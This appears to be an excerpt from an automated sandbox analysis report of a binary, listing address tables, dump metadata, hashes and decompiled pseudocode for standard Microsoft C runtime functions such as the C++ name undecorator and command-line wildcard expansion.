                      0x0094992d
                      0x00949933
                      0x00949938
                      0x0094993c
                      0x0094993f
                      0x00949944
                      0x0094994b
                      0x00949953
                      0x00949d79
                      0x00949d79
                      0x00949d7c
                      0x00949d83
                      0x00949d88
                      0x00949d89
                      0x00949d8d
                      0x00949d95
                      0x00949d96
                      0x00949d97
                      0x00949db2
                      0x00949db2
                      0x009498cb
                      0x00000000
                      0x009487ae
                      0x00949d2b
                      0x00949d2b
                      0x00949d31
                      0x00949d42
                      0x00949d4a
                      0x00949d52
                      0x00949d58
                      0x00949d5f
                      0x00949d64
                      0x00949d6e
                      0x00949d73
                      0x00000000

                      APIs
                      Strings
                      • %ls, xrefs: 00948A77, 00949D00
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlplus.h, xrefs: 00948A83, 00949D0C
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: Module$CheckStackVars@8
                      • String ID: %ls$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlplus.h
                      • API String ID: 3912913270-4241246472
                      • Opcode ID: 493a94ccd00b3167cbb56e19a02d1e2128a2cda0c43534e9f330a75614042a1e
                      • Instruction ID: 584326599e0302bb882b54016026b1fa7b5bec9bc5fd13aa8b7185d24c1ac5d4
                      • Opcode Fuzzy Hash: 493a94ccd00b3167cbb56e19a02d1e2128a2cda0c43534e9f330a75614042a1e
                      • Instruction Fuzzy Hash: 09022575A00208EFCB14DF94D891FEEB7B5BF89310F108199F51AAB291DB706A85CF91
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0096A860 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 117COMMONLIBRARYCODE
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E0096A860(void* __ebx, void* __edi, void* __esi, intOrPtr _a4) {
				char _v12;
				intOrPtr _v16;
				char _v20;
				char _v28;
				char _v36;
				char _v44;
				char _v52;
				char _v60;
				char* _t28;
				char* _t29;
				char* _t30;
				intOrPtr _t33;
				intOrPtr _t34;
				intOrPtr _t36;
				char _t43;
				char* _t44;
				intOrPtr _t45;
				intOrPtr _t79;
				intOrPtr _t82;
				intOrPtr _t83;

				_t86 = __esi;
				_t85 = __edi;
				_t51 = __ebx;
				E0095F3F0( &_v12);
				if( *0xb30644 != 0) {
					_t28 =  *0xb30644; // 0x0
					if( *_t28 != 0x3f) {
						L4:
						_t29 =  *0xb30644; // 0x0
						__eflags =  *_t29 - 0x3f;
						if( *_t29 != 0x3f) {
							L11:
							_t30 =  *0xb30644; // 0x0
							__eflags =  *_t30 - 0x3f;
							if(__eflags != 0) {
								L15:
								E0095F820( &_v12, E009644C0(_t51, _t85, _t86, __eflags,  &_v60));
							} else {
								_t33 =  *0xb30644; // 0x0
								__eflags =  *((char*)(_t33 + (1 << 0))) - 0x3f;
								if(__eflags != 0) {
									goto L15;
								} else {
									_t34 =  *0xb30644; // 0x0
									__eflags =  *((char*)(_t34 + (1 << 1))) - 0x40;
									if(__eflags != 0) {
										goto L15;
									} else {
										E0095F920( &_v12, 2);
									}
								}
							}
						} else {
							_t36 =  *0xb30644; // 0x0
							__eflags =  *((char*)(_t36 + (1 << 0))) - 0x24;
							if( *((char*)(_t36 + (1 << 0))) != 0x24) {
								goto L11;
							} else {
								E0095F820( &_v12, E00968500(_t51, _t85, _t86,  &_v44, 0));
								__eflags = E0096AB70( &_v12) - 2;
								if(__eflags == 0) {
									L9:
									_t79 =  *0xb30644; // 0x0
									 *0xb30640 = _t79;
									E0095F820( &_v12, E009644C0(_t51, _t85, _t86, __eflags,  &_v52));
								} else {
									_t43 = E00962290();
									__eflags = _t43;
									if(_t43 == 0) {
										_t44 =  *0xb30640; // 0x0
										__eflags =  *_t44;
										if(__eflags != 0) {
											goto L9;
										}
									}
								}
							}
						}
					} else {
						_t45 =  *0xb30644; // 0x0
						_t96 =  *((char*)(_t45 + (1 << 0))) - 0x40;
						if( *((char*)(_t45 + (1 << 0))) != 0x40) {
							goto L4;
						} else {
							_t82 =  *0xb30640; // 0x0
							_t83 = _t82 + 2;
							 *0xb30640 = _t83;
							_v20 = E00960060("CV: ", 4);
							_v16 = _t83;
							E0095F820( &_v12, E0095FAA0( &_v36,  &_v20, E009644C0(__ebx, __edi, __esi, _t96,  &_v28)));
						}
					}
				}
				E0095F240(_a4,  &_v12);
				return _a4;
			}























                      0x0096a860
                      0x0096a860
                      0x0096a860
                      0x0096a869
                      0x0096a875
                      0x0096a87b
                      0x0096a886
                      0x0096a8ed
                      0x0096a8ed
                      0x0096a8f5
                      0x0096a8f8
                      0x0096a96c
                      0x0096a974
                      0x0096a97d
                      0x0096a980
                      0x0096a9b9
                      0x0096a9c9
                      0x0096a982
                      0x0096a98a
                      0x0096a993
                      0x0096a996
                      0x00000000
                      0x0096a998
                      0x0096a99f
                      0x0096a9a8
                      0x0096a9ab
                      0x00000000
                      0x0096a9ad
                      0x0096a9b2
                      0x0096a9b2
                      0x0096a9ab
                      0x0096a996
                      0x0096a8fa
                      0x0096a902
                      0x0096a90b
                      0x0096a90e
                      0x00000000
                      0x0096a910
                      0x0096a922
                      0x0096a92f
                      0x0096a932
                      0x0096a949
                      0x0096a949
                      0x0096a94f
                      0x0096a965
                      0x0096a934
                      0x0096a934
                      0x0096a939
                      0x0096a93b
                      0x0096a93d
                      0x0096a945
                      0x0096a947
                      0x00000000
                      0x00000000
                      0x0096a947
                      0x0096a93b
                      0x0096a96a
                      0x0096a90e
                      0x0096a888
                      0x0096a890
                      0x0096a899
                      0x0096a89c
                      0x00000000
                      0x0096a89e
                      0x0096a89e
                      0x0096a8a4
                      0x0096a8a7
                      0x0096a8bc
                      0x0096a8bf
                      0x0096a8e3
                      0x0096a8e3
                      0x0096a89c
                      0x0096a886
                      0x0096a9d5
                      0x0096a9e0

                      APIs
                      • std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 0096A869
                      • operator+.LIBVCRUNTIMED ref: 0096A8D7
                        • Part of subcall function 0095FAA0: DName::operator+.LIBCMTD ref: 0095FAC0
                      • Mailbox.LIBCMTD ref: 0096A8E3
                      • UnDecorator::getDecoratedName.LIBVCRUNTIMED ref: 0096A8C6
                        • Part of subcall function 009644C0: UnDecorator::getDecoratedName.LIBVCRUNTIMED ref: 009644EB
                        • Part of subcall function 009644C0: Mailbox.LIBCMTD ref: 00964536
                      • Mailbox.LIBCMTD ref: 0096A922
                      • UnDecorator::getDecoratedName.LIBVCRUNTIMED ref: 0096A959
                      • Mailbox.LIBCMTD ref: 0096A965
                      • DName::operator=.LIBVCRUNTIMED ref: 0096A9B2
                      • Mailbox.LIBCMTD ref: 0096A9D5
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: Mailbox$DecoratedDecorator::getName$Iterator_baseIterator_base::_Name::operator+Name::operator=operator+std::_
                      • String ID: CV:
                      • API String ID: 1608807181-3725821052
                      • Opcode ID: a905ab1b8031b5bf02fae57587cd15625032804105bdd0a03782d3677ad01f62
                      • Instruction ID: 8986820f0516fc25d5140f842a3c39ed7ce234f7a2f73a1eaa02e8d63d941631
                      • Opcode Fuzzy Hash: a905ab1b8031b5bf02fae57587cd15625032804105bdd0a03782d3677ad01f62
                      • Instruction Fuzzy Hash: F841C3B19400149BEB14EFA0D8B3BBE3BB9AFD1301F244169E40767A56DF345A44CB81
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00967B30 Relevance: 19.6, APIs: 13, Instructions: 111COMMONLIBRARYCODE
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E00967B30(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v28;
				intOrPtr _v32;
				char _v36;
				intOrPtr _v40;
				char _v44;
				char _v52;
				char _v60;
				char _v68;
				char _v76;
				char _v84;
				char _v92;
				char _v100;
				void* _t37;
				intOrPtr _t40;
				intOrPtr _t52;
				char* _t54;
				intOrPtr _t56;
				char* _t66;
				char* _t67;
				char* _t78;
				char _t85;
				char _t87;
				void* _t92;
				void* _t93;

				E0095F3F0( &_v28);
				_t37 = E0096A1E0(__ebx, __edi, __esi,  &_v52, 1, 0);
				_t93 = _t92 + 0xc;
				E0095F820( &_v28, _t37);
				if(E0096AB70( &_v28) == 0) {
					_t78 =  *0xb30640; // 0x0
					_t87 =  *_t78;
					if(_t87 != 0) {
						_t54 =  *0xb30640; // 0x0
						_t99 =  *_t54 - 0x40;
						if( *_t54 != 0x40) {
							_v36 = E00960060("::", 2);
							_v32 = _t87;
							_t56 = E009675A0(__ebx, __edi, __esi, _t99,  &_v60);
							_t93 = _t93 + 0xc;
							_v8 = _t56;
							_v12 = E0095FB30(_v8,  &_v68,  &_v36);
							E0095F820( &_v28, E0095FB70(_v12,  &_v76,  &_v28));
						}
					}
				}
				_t66 =  *0xb30640; // 0x0
				if( *_t66 != 0x40) {
					_t67 =  *0xb30640; // 0x0
					_t85 =  *_t67;
					__eflags = _t85;
					if(_t85 == 0) {
						_t40 = E0096A560( &_v28);
						__eflags = _t40;
						if(_t40 == 0) {
							_v44 = E00960060("::", 2);
							_v40 = _t85;
							_v16 = E0095F350( &_v84, 1);
							_v20 = E0095FB30(_v16,  &_v92,  &_v44);
							E0095F820( &_v28, E0095FB70(_v20,  &_v100,  &_v28));
						} else {
							E0095F920( &_v28, 1);
						}
					} else {
						E0095F920( &_v28, 2);
					}
				} else {
					_t52 =  *0xb30640; // 0x0
					 *0xb30640 = _t52 + 1;
				}
				E0095F240(_a4,  &_v28);
				return _a4;
			}































                      0x00967b39
                      0x00967b46
                      0x00967b4b
                      0x00967b52
                      0x00967b61
                      0x00967b63
                      0x00967b69
                      0x00967b6e
                      0x00967b70
                      0x00967b78
                      0x00967b7b
                      0x00967b8c
                      0x00967b8f
                      0x00967b96
                      0x00967b9b
                      0x00967b9e
                      0x00967bb1
                      0x00967bc8
                      0x00967bc8
                      0x00967b7b
                      0x00967b6e
                      0x00967bcd
                      0x00967bd9
                      0x00967bea
                      0x00967bf0
                      0x00967bf3
                      0x00967bf5
                      0x00967c06
                      0x00967c0b
                      0x00967c0d
                      0x00967c2a
                      0x00967c2d
                      0x00967c3a
                      0x00967c4d
                      0x00967c64
                      0x00967c0f
                      0x00967c14
                      0x00967c14
                      0x00967bf7
                      0x00967bfc
                      0x00967bfc
                      0x00967bdb
                      0x00967bdb
                      0x00967be3
                      0x00967be3
                      0x00967c70
                      0x00967c7b

                      APIs
                      • std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 00967B39
                      • Mailbox.LIBCMTD ref: 00967B52
                      • Mailbox.LIBCMTD ref: 00967BC8
                      • DName::DName.LIBVCRUNTIMED ref: 00967C35
                        • Part of subcall function 0095F350: DNameStatusNode::make.LIBVCRUNTIMED ref: 0095F3AE
                      • DName::operator+.LIBCMTD ref: 00967C48
                      • DName::operator+.LIBCMTD ref: 00967BBF
                        • Part of subcall function 0095FB70: Mailbox.LIBCMTD ref: 0095FB80
                        • Part of subcall function 0095FB70: Mailbox.LIBCMTD ref: 0095FB98
                      • DName::operator+.LIBCMTD ref: 00967BAC
                        • Part of subcall function 0095FB30: Mailbox.LIBCMTD ref: 0095FB40
                        • Part of subcall function 0095FB30: Mailbox.LIBCMTD ref: 0095FB58
                      • DName::operator=.LIBVCRUNTIMED ref: 00967BFC
                      • DName::isEmpty.LIBCMTD ref: 00967C06
                      • DName::operator=.LIBVCRUNTIMED ref: 00967C14
                        • Part of subcall function 009675A0: std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 009675AC
                        • Part of subcall function 009675A0: Mailbox.LIBCMTD ref: 00967604
                      • DName::operator+.LIBCMTD ref: 00967C5B
                      • Mailbox.LIBCMTD ref: 00967C64
                      • Mailbox.LIBCMTD ref: 00967C70
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: Mailbox$Name::operator+$Iterator_baseIterator_base::_NameName::operator=std::_$EmptyName::Name::isNode::makeStatus
                      • String ID:
                      • API String ID: 2733737839-0
                      • Opcode ID: 21463f2bc9964846d8301a76e017eca70799eb42fd044d1db9449bf6df6a9e24
                      • Instruction ID: 752fd54c545ad98ba7f77eac273204500bdc9fb421f06b3577f980b10f4f1498
                      • Opcode Fuzzy Hash: 21463f2bc9964846d8301a76e017eca70799eb42fd044d1db9449bf6df6a9e24
                      • Instruction Fuzzy Hash: BF416F719541099BDB04EFE0DCB2FEEBB79AF94304F14416AE506A7291EB306A48CB90
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00964EA0 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 114COMMONLIBRARYCODE
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E00964EA0(intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				char _v24;
				signed int _v28;
				char _v32;
				char* _v36;
				char _v40;
				char* _v44;
				char _v48;
				intOrPtr _v52;
				char _v56;
				intOrPtr _v60;
				char _v64;
				char _v72;
				char* _t48;
				char* _t79;
				signed int _t80;

				E0095F3F0( &_v24);
				_t48 =  *0xb30640; // 0x0
				if( *_t48 == 0) {
					E0095F350(_a4, 1);
					return _a4;
				}
				_t79 =  *0xb30640; // 0x0
				_v8 =  *_t79;
				_v8 = _v8 - 0x30;
				if(_v8 > 7) {
					E0095F350(_a4, 2);
					return _a4;
				}
				_t80 = _v8;
				switch( *((intOrPtr*)(_t80 * 4 +  &M00965018))) {
					case 0:
						_v32 = E00960060("char ", 5);
						_v28 = _t80;
						E0095F7E0( &_v24,  &_v32);
						goto L9;
					case 1:
						_v40 = E00960060("short ", 6);
						_v36 = __edx;
						__ecx =  &_v40;
						__ecx =  &_v24;
						__eax = E0095F7E0(__ecx,  &_v40);
						goto L9;
					case 2:
						goto L9;
					case 3:
						_v48 = E00960060("int ", 4);
						_v44 = __edx;
						__edx =  &_v48;
						__ecx =  &_v24;
						__eax = E0095F7E0(__ecx,  &_v48);
						goto L9;
					case 4:
						_v56 = E00960060("long ", 5);
						_v52 = __edx;
						__eax =  &_v56;
						__ecx =  &_v24;
						__eax = E0095F7E0(__ecx,  &_v56);
						L9:
						_t73 =  *0xb30640; // 0x0
						_v16 =  *_t73;
						_t57 =  *0xb30640; // 0x0
						 *0xb30640 = _t57 + 1;
						_v12 = _v16;
						_t83 = _v12 - 0x31;
						_v12 = _t83;
						if(_v12 > 6) {
							goto L12;
						}
						switch( *((intOrPtr*)(_v12 * 4 +  &M00965038))) {
							case 0:
								goto L11;
							case 1:
								goto L12;
						}
					case 5:
						L11:
						_v64 = E00960060("unsigned ", 9);
						_v60 = _t83;
						E0095F820( &_v24, E0095FAA0( &_v72,  &_v64,  &_v24));
						goto L12;
					case 6:
						L12:
						E0095F240(_a4,  &_v24);
						return _a4;
				}
			}





















                      0x00964ea9
                      0x00964eae
                      0x00964eb8
                      0x00965009
                      0x00000000
                      0x0096500e
                      0x00964ebe
                      0x00964ec7
                      0x00964ed0
                      0x00964ed7
                      0x00964f7a
                      0x00000000
                      0x00964f7f
                      0x00964edd
                      0x00964ee0
                      0x00000000
                      0x00964ef6
                      0x00964ef9
                      0x00964f03
                      0x00000000
                      0x00000000
                      0x00964f19
                      0x00964f1c
                      0x00964f1f
                      0x00964f23
                      0x00964f26
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00964f3e
                      0x00964f41
                      0x00964f44
                      0x00964f48
                      0x00964f4b
                      0x00000000
                      0x00000000
                      0x00964f61
                      0x00964f64
                      0x00964f67
                      0x00964f6b
                      0x00964f6e
                      0x00964f87
                      0x00964f87
                      0x00964f90
                      0x00964f93
                      0x00964f9b
                      0x00964fa3
                      0x00964fa9
                      0x00964fac
                      0x00964fb3
                      0x00000000
                      0x00000000
                      0x00964fb8
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00964fbf
                      0x00964fce
                      0x00964fd1
                      0x00964fec
                      0x00000000
                      0x00000000
                      0x00964ff1
                      0x00964ff8
                      0x00000000
                      0x00000000

                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: MailboxNameName::$Iterator_baseIterator_base::_operator+std::_
                      • String ID: char $int $long $short $unsigned
                      • API String ID: 3503010255-3894466517
                      • Opcode ID: 6de13a68525a34cf174277f2cbbb8b2cf5f6e1d55bd4cc327468987315d1abb8
                      • Instruction ID: 9612d596462e1dc0375198772b903892f7fbcbacb7e96181f456fe54ea278d90
                      • Opcode Fuzzy Hash: 6de13a68525a34cf174277f2cbbb8b2cf5f6e1d55bd4cc327468987315d1abb8
                      • Instruction Fuzzy Hash: 3F411FB1D54108EFCB04EFE4D992AEEBBB4AF84301F24816AE90677251EB315A04CB91
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 009AD2C0 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 221timeCOMMONLIBRARYCODE
                      Download Yara Rule
                      C-Code - Quality: 98%
                      			E009AD2C0(void* __ebx, void* __ecx, void* __edi, void* __esi, signed int* _a4, void* _a8) {
				char _v6;
				char _v7;
				char _v8;
				signed int* _v12;
				char _v16;
				signed int _v20;
				char _v24;
				signed int _v28;
				intOrPtr _v32;
				intOrPtr* _v36;
				char _v40;
				intOrPtr _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				char _v64;
				char _v68;
				signed int _v72;
				signed int _v76;
				intOrPtr _v80;
				intOrPtr* _v84;
				char _v88;
				intOrPtr _v92;
				char _v104;
				void* _t107;
				void* _t109;
				signed char _t111;
				void* _t116;
				void* _t134;
				signed int _t136;
				signed int _t139;
				signed int _t143;
				void* _t149;
				void* _t150;
				void* _t151;
				signed int _t180;
				signed int _t195;
				signed int _t198;
				void* _t202;
				void* _t203;
				void* _t204;
				void* _t205;
				void* _t208;

				_t203 = __esi;
				_t202 = __edi;
				_t151 = __ecx;
				_t150 = __ebx;
				if(_a8 == 0) {
					_v40 = 0;
				} else {
					_v40 = 1;
				}
				_v44 = _v40;
				_t211 = _v44;
				if(_v44 == 0) {
					_t149 = L00994930(_t211, 2, L"minkernel\\crts\\ucrt\\src\\appcrt\\startup\\argv_wildcards.cpp", 0x138, 0, L"%ls", L"result != nullptr");
					_t204 = _t204 + 0x18;
					if(_t149 == 1) {
						asm("int3");
					}
				}
				if(_v44 != 0) {
					 *_a8 = 0;
					E009AE400( &_v104);
					_v12 = _a4;
					while(1) {
						__eflags =  *_v12;
						if( *_v12 == 0) {
							break;
						}
						_v8 = 0x2a;
						_v7 = 0x3f;
						_v6 = 0;
						_t136 = E009AE300(_v12,  &_v8);
						_t208 = _t204 + 8;
						_v52 = _t136;
						__eflags = _v52;
						if(_v52 != 0) {
							_t139 = E009ADAE0(_t150, _t202, _t203,  *_v12, _v52,  &_v104);
							_t204 = _t208 + 0xc;
							_v56 = _t139;
							__eflags = _v56;
							if(_v56 == 0) {
								L17:
								_t180 =  &(_v12[1]);
								__eflags = _t180;
								_v12 = _t180;
								continue;
							}
							_v76 = _v56;
							E009AE500( &_v104);
							return _v76;
						}
						_t143 = E009AD8A0( *_v12, _t202,  *_v12, 0, 0,  &_v104);
						_t204 = _t208 + 0x10;
						_v48 = _t143;
						__eflags = _v48;
						if(_v48 == 0) {
							goto L17;
						}
						_v72 = _v48;
						E009AE500( &_v104);
						return _v72;
					}
					_v60 = E009AEFB0( &_v104) + 1;
					_v32 = 0;
					_v28 = E009AE980( &_v104);
					while(1) {
						_t107 = E009AEAF0( &_v104);
						__eflags = _v28 - _t107;
						if(_v28 == _t107) {
							break;
						}
						_t134 = E0099BFB6(_v28);
						_t204 = _t204 + 4;
						_t51 = _t134 + 1; // 0x1
						_v32 = _v32 + _t51;
						_t198 = _v28 + 4;
						__eflags = _t198;
						_v28 = _t198;
					}
					_t109 = E0099B890(_t202, _v60, _v32, 1);
					_t205 = _t204 + 0xc;
					E0099B460( &_v16, _t109);
					_t111 = E0099B520( &_v16);
					__eflags = _t111 & 0x000000ff;
					if((_t111 & 0x000000ff) != 0) {
						_v84 = E0099B6D0( &_v16);
						_v64 = E0099B6D0( &_v16) + _v60 * 4;
						_v36 = _v84;
						_v24 = _v64;
						_v20 = E009AE980( &_v104);
						while(1) {
							_t116 = E009AEAF0( &_v104);
							__eflags = _v20 - _t116;
							if(_v20 == _t116) {
								break;
							}
							_v68 = E0099BFB6(_v20) + 1;
							_v88 = _v32 - _v24 - _v64;
							E00994A20(E009AE1E0( &_v24,  &_v88, _v20,  &_v68), _t126, L"traits::tcsncpy_s( character_it, character_count - (character_it - character_first), *it, count)", L"common_expand_argv_wildcards", L"minkernel\\crts\\ucrt\\src\\appcrt\\startup\\argv_wildcards.cpp", 0x175, 0);
							_t205 = _t205 + 0x2c;
							 *_v36 = _v24;
							_v36 = _v36 + 4;
							_v24 = _v24 + _v68;
							_t195 = _v20 + 4;
							__eflags = _t195;
							_v20 = _t195;
						}
						 *_a8 = E0099B5E0( &_v16);
						_v92 = 0;
						E0099B4C0( &_v16);
						E009AE500( &_v104);
						return _v92;
					}
					_v80 = 0xffffffff;
					E0099B4C0( &_v16);
					E009AE500( &_v104);
					return _v80;
				} else {
					 *((intOrPtr*)(L00992F70(_t151))) = 0x16;
					E00992900(L"result != nullptr", L"common_expand_argv_wildcards", L"minkernel\\crts\\ucrt\\src\\appcrt\\startup\\argv_wildcards.cpp", 0x138, 0);
					return 0x16;
				}
			}















































                      0x009ad2c0
                      0x009ad2c0
                      0x009ad2c0
                      0x009ad2c0
                      0x009ad2cc
                      0x009ad2d7
                      0x009ad2ce
                      0x009ad2ce
                      0x009ad2ce
                      0x009ad2e1
                      0x009ad2e4
                      0x009ad2e8
                      0x009ad302
                      0x009ad307
                      0x009ad30d
                      0x009ad30f
                      0x009ad30f
                      0x009ad30d
                      0x009ad314
                      0x009ad34c
                      0x009ad355
                      0x009ad35d
                      0x009ad36b
                      0x009ad36e
                      0x009ad371
                      0x00000000
                      0x00000000
                      0x009ad377
                      0x009ad37b
                      0x009ad37f
                      0x009ad38b
                      0x009ad390
                      0x009ad393
                      0x009ad396
                      0x009ad39a
                      0x009ad3e1
                      0x009ad3e6
                      0x009ad3e9
                      0x009ad3ec
                      0x009ad3f0
                      0x009ad408
                      0x009ad365
                      0x009ad365
                      0x009ad368
                      0x00000000
                      0x009ad368
                      0x009ad3f5
                      0x009ad3fb
                      0x00000000
                      0x009ad400
                      0x009ad3aa
                      0x009ad3af
                      0x009ad3b2
                      0x009ad3b5
                      0x009ad3b9
                      0x00000000
                      0x009ad3d1
                      0x009ad3be
                      0x009ad3c4
                      0x00000000
                      0x009ad3c9
                      0x009ad418
                      0x009ad41b
                      0x009ad42a
                      0x009ad438
                      0x009ad43b
                      0x009ad440
                      0x009ad443
                      0x00000000
                      0x00000000
                      0x009ad449
                      0x009ad44e
                      0x009ad454
                      0x009ad458
                      0x009ad432
                      0x009ad432
                      0x009ad435
                      0x009ad435
                      0x009ad467
                      0x009ad46c
                      0x009ad473
                      0x009ad47b
                      0x009ad483
                      0x009ad485
                      0x009ad4ae
                      0x009ad4bf
                      0x009ad4c5
                      0x009ad4cb
                      0x009ad4d6
                      0x009ad4e4
                      0x009ad4e7
                      0x009ad4ec
                      0x009ad4ef
                      0x00000000
                      0x00000000
                      0x009ad500
                      0x009ad50e
                      0x009ad540
                      0x009ad545
                      0x009ad54e
                      0x009ad556
                      0x009ad55f
                      0x009ad4de
                      0x009ad4de
                      0x009ad4e1
                      0x009ad4e1
                      0x009ad572
                      0x009ad574
                      0x009ad57e
                      0x009ad586
                      0x00000000
                      0x009ad58b
                      0x009ad487
                      0x009ad491
                      0x009ad499
                      0x00000000
                      0x009ad316
                      0x009ad31b
                      0x009ad337
                      0x00000000
                      0x009ad33f

                      APIs
                      • std::exception::exception.LIBCMTD ref: 009AD355
                      • std::_Timevec::_Timevec.LIBCPMTD ref: 009AD473
                        • Part of subcall function 009AE1E0: __wcstombs_l.LIBCMTD ref: 009AE1FD
                      • __invoke_watson_if_error.LIBCMTD ref: 009AD540
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: TimevecTimevec::___invoke_watson_if_error__wcstombs_lstd::_std::exception::exception
